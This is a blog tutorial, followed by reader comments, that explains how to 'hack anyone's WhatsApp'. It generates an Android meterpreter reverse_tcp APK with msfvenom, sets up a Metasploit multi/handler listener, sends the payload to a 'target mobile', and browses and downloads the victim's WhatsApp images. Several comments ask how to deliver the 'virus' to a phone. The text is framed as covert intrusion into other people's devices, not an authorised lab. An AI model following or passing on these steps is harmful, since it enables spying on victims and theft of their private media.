Today I will tell you how we can hack anyone’s Whatsapp account using the meterpreter Android Payload, we run this process on our local network, and you can try this method over the internet, but you need a static IP address and the second option is using third party tool. But today we run the process on our local network
- Hiddeneye Install in Termux
- hack Facebook account Facebook Phishing
- Whatsapp Hacking App 2021
- Hack Gmail Password Phishing 2021
- Hack WhatsApp using Meterpreter in Kali Linux
Let’s open your Kali Linux Terminal and run the ifconfig command for checking our local machine IP address.
1 |
ifconfig |
Now we have our local machine IP address, in my case my local machine IP is 192.168.1.23, in your case your IP address is different, After get the machine IP we need to create a msfvenom Android Payload let’s run this command for creating android reverse Payload.
1 |
msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<use any port> R > output_path_here.apk |

After hitting the Enter keyboard button our payload is successfully generated now we need to start our Metasploit payload listener run the msfconsole command.
1 |
msfconsole |

Our Metasploit framework is stated let’s load the android meterpreter reverse payload using the multi-hander exploit.
1 2 |
use exploit/multi/handler set payload android/meterpreter/reverse_tcp |

Now set your local machine IP address, After set the lhost IP address I direct exploit the payload, if you use a different port for your payload you need to change your lport you can change your lport using the set lport <> command.
1 2 |
set lhost (YOUR IP) exploit |

Now our reverse TCP hander is stated let’s send the payload to your target mobile and run the payload on the target mobile.
After opening the android payload we will get a meterpreter session as we can see them in the picture.

After getting a session we can run any Linux command let’s change our current working directory using this command.
1 2 |
cd sdcard ls -l |


Now we are inside the target mobile phone again we change our directory sdcard to WhatsApp Directory.
1 2 |
cd WhatsApp ls -l |

here we can see our target mobile Whatsapp Files and directory let’s move to the Media directory.
1 2 |
cd Media ls -l |

After coming to the media folder, we can see the ALL media folder now I’m going to download our target Whatsapp images again change the directory using this command.
1 2 |
cd WhatsApp \ Images ls -l |


You can see here your target Whatsapp image you can use the ls command for listing all images and you can download any image file using the download command.
1 |
download (YOUR FILE NAME) |

Thank you for sharing such a blog!
King regards,
Boswell Valenzuela
I got this site from my pal who shared with me about this
web page and now this time I am visiting this site and reading very informative
articles at this time.
how can i download a entire folder ?
How can i push this virus on my phone i haven’t found virus what is the location of this virus where this whatsapp.apk saved ?
You just have to google the local host ip address then you will get the link of whatsapp
I enjoy the efforts you have put in this, appreciate it for all the great articles.
Hello to every body, it’s my first pay a visit of this website;
this web site contains awesome and actually fine material for readers.
After doing all this when i use exploit command so this message appears Exploit failed: One or more options failed to validate: LHOST.
Hi, I think your website might be having browser compatibility issues. When I look at your website in Opera,
it looks fine but when opening in Internet Explorer, it has some overlapping.
I just wanted to give you a quick heads up! Other than that, awesome blog!
Fabulous, what a web site it is! This blog presents helpful information to us, keep it up.
Hey There. I discovered your blog the use of msn. This is
an extremely well written article. I’ll be sure to bookmark it and return to
learn extra of your useful information. Thanks for the post.
I will certainly return.
i tried on my own phone. now please tell me what is the procedure to remove SING IN-TO NETWORK sign whenever opening mobile network data
Can anyone help me on how to download the virus
So what about Text’s . It will be no acceseble ? We want texts which are encrypted. Any idea?!
Hi,
This part is missing from the instructions:
* let’s send the payload in your target mobile and run the payload on target mobile.*
Can you add it please?
same here, i dont know how to send the payload
i am not getting exploit connection
Wow, marvelous blog structure! How long have you been running a blog for? you made blogging look easy. The entire look of your website is excellent, let alone the content material!!
Nice 👍